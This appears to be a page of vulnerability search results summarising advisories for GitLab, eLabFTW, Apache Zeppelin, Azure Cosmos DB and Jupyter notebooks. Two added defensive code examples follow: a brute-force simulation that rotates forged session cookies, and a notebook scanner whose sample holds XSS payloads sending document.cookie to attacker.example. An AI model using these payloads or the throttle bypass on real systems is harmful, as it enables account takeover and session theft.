Lucene search

1255 matches found

CVE · added 2021/11/12 10:05 p.m. · 62 views

CVE-2021-3786

CVE-2021-3786 concerns Lenovo notebook/ThinkPad systems with a vulnerable SMI callback in the CSME configuration. The issue is a potential flaw in the SMI callback function that could allow leaking data from the SMRAM range. Public records describe this as a data leakage risk affecting confidenti...

CVSS 5.5 · AI score 5.4 · EPSS 0.00044
Exploits 0 · References 1 · Affected Software 1

OSV · added 2021/11/05 12:15 a.m. · 0 views

UBUNTU-CVE-2021-39906

Improper validation of ipynb files in GitLab CE/EE version 13.5 and above allows an attacker to execute arbitrary JavaScript code on the victim's behalf...

CVSS 8.7 · AI score 7.2 · EPSS 0.01
Exploits 0 · References 2

Positive Technologies · added 2021/11/04 12:00 a.m. · 3 views

PT-2021-22753 · Gitlab · Gitlab Ce/Ee +1

Name of the Vulnerable Software and Affected Versions: GitLab CE/EE versions 13.5 and above Description: The issue arises from improper validation of ipynb files, allowing an attacker to execute arbitrary JavaScript code on the victim's behalf. This enables the attacker to perform actions as the...

CVSS 8.7 · AI score 7.6 · EPSS 0.01
Exploits 0 · References 11

Kitploit · added 2021/10/31 11:30 a.m. · 31 views

PeTeReport - An Open-Source Application Vulnerability Reporting Tool

PeTeReport (PenTest Report) is an open-source application vulnerability reporting tool designed to assist pentesting/red-teaming efforts by simplifying the writing and generation of reports. Focused on product security, the tool helps security researchers and pentesters provide detaile...

AI score 7.2
Exploits 0 · References 8

OSV · added 2021/10/22 7:15 p.m. · 5 views

CVE-2021-41171

eLabFTW is an open source electronic lab notebook manager for research teams. In versions of eLabFTW before 4.1.0, it allows attackers to bypass a brute-force protection mechanism by using many different forged PHPSESSID values in HTTP Cookie header. This issue has been addressed by implementing...

CVSS 8.8 · AI score 6.9
Exploits 0 · References 5

CVE · added 2021/10/22 6:55 p.m. · 51 views

CVE-2021-41171

CVE-2021-41171 affects eLabFTW prior to 4.1.0. The issue allows bypassing the brute-force protection by presenting a different forged PHPSESSID value in the HTTP Cookie header on each attempt, so password-guessing attempts are not throttled, as described in multiple sources. Remediation is to upgrade to version 4.1.0 (upstream rate limiting is a valid option...

CVSS 8.8 · AI score 7.2 · EPSS 0.00227
Exploits 1 · References 5 · Affected Software 1
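An added example (not eLabFTW's code) of the failure class the CVE-2021-41171 entries describe: a login throttle keyed on a cookie the client supplies is reset by every new cookie, whereas one keyed on the source address and the target account is not. The threshold, window, request shape and sample address below are assumptions.

```python
"""Added example (not eLabFTW's code): a brute-force throttle keyed on a
client-supplied cookie versus one keyed on attributes the client cannot
freely rotate. Threshold, window and request shape are assumptions."""
import time
from collections import defaultdict

MAX_FAILURES = 5          # assumed lockout threshold
WINDOW_SECONDS = 300      # assumed lockout window


class LoginThrottle:
    """Counts failed logins per key and refuses once a key has MAX_FAILURES
    failures inside WINDOW_SECONDS. The key function decides what an
    attacker has to change to get a fresh counter."""

    def __init__(self, key_func, now=time.monotonic):
        self._key_func = key_func
        self._now = now
        self._failures = defaultdict(list)   # key -> failure timestamps

    def _recent(self, key):
        cutoff = self._now() - WINDOW_SECONDS
        self._failures[key] = [t for t in self._failures[key] if t >= cutoff]
        return self._failures[key]

    def allow(self, request):
        return len(self._recent(self._key_func(request))) < MAX_FAILURES

    def record_failure(self, request):
        self._recent(self._key_func(request)).append(self._now())


# Vulnerable pattern: the counter is keyed on PHPSESSID, a value the client
# chooses, so forging a new one per request yields a fresh counter each time.
def key_by_session_cookie(request):
    return request["cookies"].get("PHPSESSID", "")


# Hardened pattern: key on source address plus target username. The attacker
# cannot rotate these without losing the target or changing network path.
def key_by_ip_and_user(request):
    return (request["remote_addr"], request["form"]["username"].lower())


def simulate_attack(throttle, attempts=50):
    """Attacker sends `attempts` wrong passwords for one account from one
    address, forging a fresh PHPSESSID on every request. Returns how many
    attempts reached the password check."""
    reached = 0
    for i in range(attempts):
        request = {                                   # constructed sample
            "remote_addr": "198.51.100.7",
            "cookies": {"PHPSESSID": f"forged{i:04d}"},
            "form": {"username": "alice", "password": f"guess{i}"},
        }
        if throttle.allow(request):
            reached += 1
            throttle.record_failure(request)          # every guess is wrong
    return reached


if __name__ == "__main__":
    print("cookie-keyed throttle let through:",
          simulate_attack(LoginThrottle(key_by_session_cookie)))
    print("ip+user-keyed throttle let through:",
          simulate_attack(LoginThrottle(key_by_ip_and_user)))
```

With the cookie-keyed throttle all 50 guesses reach the password check; with the address-plus-account key only the first 5 do. The same reasoning applies to any throttle keyed on a token the client can mint itself.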
Positive Technologies · added 2021/09/14 12:00 a.m. · 2 views

PT-2021-6962 · Microsoft · Visual Studio Code

Name of the Vulnerable Software and Affected Versions: Visual Studio Code affected versions not specified Description: The issue is related to errors in the representation of information by the user interface, which can allow an attacker to conduct spoofing attacks. There is also a mention of a...

CVSS 5.5 · AI score 6.4 · EPSS 0.03766
Exploits 0 · References 6

CNVD · added 2021/09/04 12:00 a.m. · 20 views

Apache Zeppelin Authentication Bypass Vulnerability

Apache Zeppelin is a web-based open source notebook application from the Apache Foundation that supports interactive data analysis and collaborative documentation. Apache Zeppelin 0.9.0 and earlier versions contain a...

CVSS 7.5 · AI score 4.1 · EPSS 0.00124
Exploits 0 · References 1

CNVD · added 2021/09/03 12:00 a.m. · 16 views

Apache Zeppelin Cross-Site Scripting Vulnerability

Apache Zeppelin is a web-based open source notebook application from the Apache Foundation that supports interactive data analysis and collaborative documentation. An XSS vulnerability exists. An attacker could exploit this vulnerability to inject malicious scripts...

CVSS 6.1 · AI score 1.9 · EPSS 0.007
Exploits 0 · References 1

Cvelist · added 2021/09/02 12:00 a.m. · 19 views

CVE-2020-13929 Notebook permissions bypass

Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass the Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin version 0.9.0 and prior versions...

AI score 8.2 · EPSS 0.00124
Exploits 0 · References 5

MSRC · added 2021/08/27 8:22 p.m. · 29 views

Update on the vulnerability in the Azure Cosmos DB Jupyter Notebook Feature

On August 12, 2021, a security researcher reported a vulnerability in the Azure Cosmos DB Jupyter Notebook feature that could potentially allow a user to gain access to another customer's resources by using the account's primary read-write key. We mitigated the vulnerability immediately. Our...

AI score 2.8
Exploits 0

The Hacker News · added 2021/08/27 7:50 a.m. · 29 views

Critical Cosmos Database Flaw Affected Thousands of Microsoft Azure Customers

Cloud infrastructure security company Wiz on Thursday revealed details of a now-fixed Azure Cosmos database vulnerability that could have been potentially exploited to grant any Azure user full admin access to other customers' database instances without any authorization. The flaw, which grants...

AI score 1.6
Exploits 0
OSV · added 2021/08/23 7:40 p.m. · 0 views

GHSA-HWVQ-6GJX-J797 Special Element Injection in notebook

Impact: Untrusted notebook can execute code on load. This is remote code execution, but requires user action to open a notebook. Patches: 5.7.11, 6.4.1. References: OWASP Page on Injection Prevention. For more information: If you have any questions or comments about this advisory, or vulnerabilities ...

CVSS 10 · AI score 7.4 · EPSS 0.00172
Exploits 1 · References 5

vulnersOsv · added 2021/08/23 7:40 p.m. · 0 views

fairing (>=0.0.2 <=0.0.3), hugo-jupyter (>=0.2.1 <=0.3.0) +7 more potentially affected by CVE-2021-32798 via notebook (>=4.2.3 <=5.7.10)

notebook PyPI version =4.2.3, =0.0.2, =0.2.1, =0.1.2, =0.5.0, =1.0.0, =0.1.0, =0.2.0.dev1. Source CVEs: CVE-2021-32798. Source advisory: OSV:GHSA-HWVQ-6GJX-J797...

CVSS 10 · AI score 7.2 · EPSS 0.00172
Exploits 1

vulnersOsv · added 2021/08/23 7:40 p.m. · 1 view

3deecelltracker (=1.0.0), abracadabra (>=0.0.0 <=0.0.7) +64 more potentially affected by CVE-2021-32798 via notebook (>=6.0.0 <=6.4.0)

notebook PyPI version =6.0.0, =0.0.0, =1.0.0, =1.0.1, =1.0.1, =0.0.2a0, =1.0.0, =0.3.4, =0.1.0rc1, =0.0.1, =0.0.4, =1.0.2rc8, =2.1.0rc4 and more. Source CVEs: CVE-2021-32798. Source advisory: OSV:GHSA-HWVQ-6GJX-J797...

CVSS 10 · AI score 7.2 · EPSS 0.00172
Exploits 1

vulnersOsv · added 2021/08/23 7:40 p.m. · 0 views

fairing (>=0.0.2 <=0.0.3), hugo-jupyter (>=0.2.1 <=0.3.0) +7 more potentially affected by CVE-2021-32797 via notebook (>=4.2.3 <=5.7.10)

notebook PyPI version =4.2.3, =0.0.2, =0.2.1, =0.1.2, =0.5.0, =1.0.0, =0.1.0, =0.2.0.dev1. Source CVEs: CVE-2021-32797. Source advisory: OSV:GHSA-4952-P58Q-6CRX...

CVSS 9.6 · AI score 7.2 · EPSS 0.0087
Exploits 1

vulnersOsv · added 2021/08/23 7:40 p.m. · 0 views

3deecelltracker (=1.0.0), abracadabra (>=0.0.0 <=0.0.7) +64 more potentially affected by CVE-2021-32797 via notebook (>=6.0.0 <=6.4.0)

notebook PyPI version =6.0.0, =0.0.0, =1.0.0, =1.0.1, =1.0.1, =0.0.2a0, =1.0.0, =0.3.4, =0.1.0rc1, =0.0.1, =0.0.4, =1.0.2rc8, =2.1.0rc4 and more. Source CVEs: CVE-2021-32797. Source advisory: OSV:GHSA-4952-P58Q-6CRX...

CVSS 9.6 · AI score 7.2 · EPSS 0.0087
Exploits 1

OSV · added 2021/08/23 7:40 p.m. · 0 views

GHSA-4952-P58Q-6CRX JupyterLab: XSS due to lack of sanitization of the action attribute of an html <form>

Impact: Untrusted notebook can execute code on load. This is remote code execution, but requires user action to open a notebook. Patches: Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21. References: OWASP Page on Restricting Form Submissions. For more information: If you have...

CVSS 7.4 · AI score 7.4 · EPSS 0.0087
Exploits 1 · References 5
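The GitLab entries (CVE-2021-39906, improper validation of .ipynb files) and the two Jupyter advisories above (GHSA-HWVQ-6GJX-J797 and GHSA-4952-P58Q-6CRX) share one shape: a notebook is a JSON file whose markdown cells and `text/html` outputs are rendered as HTML, so whatever the renderer fails to sanitize runs as soon as the file is opened. As an added example, not the Jupyter, JupyterLab or GitLab code, the triage scanner below walks an .ipynb and flags the HTML constructs that act on load, including the unsanitized `<form action>` the JupyterLab advisory names. The sample notebook is constructed for the demo, and the list of risky constructs is an assumption, not the upstream sanitizer's rule set.

```python
"""Added example (not Jupyter's, JupyterLab's or GitLab's code): a triage
scanner that flags HTML inside an untrusted .ipynb capable of executing when
a renderer shows the notebook without sanitizing it. The risky-construct
list and the sample notebook are assumptions constructed for the demo."""
import json
from html.parser import HTMLParser

# Constructs that make a notebook act the moment it is rendered.
RISKY_TAGS = {"script", "iframe", "object", "embed"}
RISKY_SCHEMES = ("javascript:", "data:text/html")


class RiskyHTMLFinder(HTMLParser):
    """Collects findings from one HTML fragment; it is not a sanitizer."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag in RISKY_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs.items():
            if name.startswith("on"):                 # onload=, onerror=, ...
                self.findings.append(f"<{tag} {name}=...> event handler")
            if name in ("href", "src", "action") and \
                    value.strip().lower().startswith(RISKY_SCHEMES):
                self.findings.append(f"<{tag} {name}={value!r}> script URL")
        # The JupyterLab advisory above names the unsanitized action attribute
        # of <form>; flag any form with a submission target regardless of origin.
        if tag == "form" and "action" in attrs:
            self.findings.append(
                f"<form action={attrs['action']!r}> submission target")


def _html_fragments(cell):
    """Yield every piece of a cell that a renderer treats as HTML."""
    source = cell.get("source", "")
    if cell.get("cell_type") == "markdown":
        yield "markdown", "".join(source) if isinstance(source, list) else source
    for output in cell.get("outputs", []):
        html = output.get("data", {}).get("text/html")
        if html is not None:
            yield "output text/html", "".join(html) if isinstance(html, list) else html


def scan_notebook(nb_json):
    """Return [(cell_index, location, finding), ...] for a parsed notebook."""
    results = []
    for idx, cell in enumerate(nb_json.get("cells", [])):
        for location, fragment in _html_fragments(cell):
            finder = RiskyHTMLFinder()
            finder.feed(fragment)
            results.extend((idx, location, f) for f in finder.findings)
    return results


def scan_notebook_text(text):
    return scan_notebook(json.loads(text))


# Constructed sample: a benign cell, a markdown cell carrying a <form> that
# posts to an attacker-chosen origin, and an output whose image tag carries
# an onerror handler that exfiltrates document.cookie.
SAMPLE_NOTEBOOK = json.dumps({
    "nbformat": 4, "nbformat_minor": 5, "metadata": {},
    "cells": [
        {"cell_type": "code", "source": "print('hi')", "outputs": [
            {"output_type": "execute_result", "data": {"text/plain": "hi"}}]},
        {"cell_type": "markdown",
         "source": ["# Results\n",
                    "<form action=\"https://attacker.example/collect\">"
                    "<input name=q></form>"]},
        {"cell_type": "code", "source": "", "outputs": [
            {"output_type": "display_data",
             "data": {"text/html": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"}}]},
    ],
})

if __name__ == "__main__":
    for idx, location, finding in scan_notebook_text(SAMPLE_NOTEBOOK):
        print(f"cell {idx} [{location}]: {finding}")
```

Run it over a notebook pulled from a merge request or a shared drive before opening it in a renderer whose sanitizer version you do not control; a clean result means only that none of the listed constructs is present, not that the file is safe.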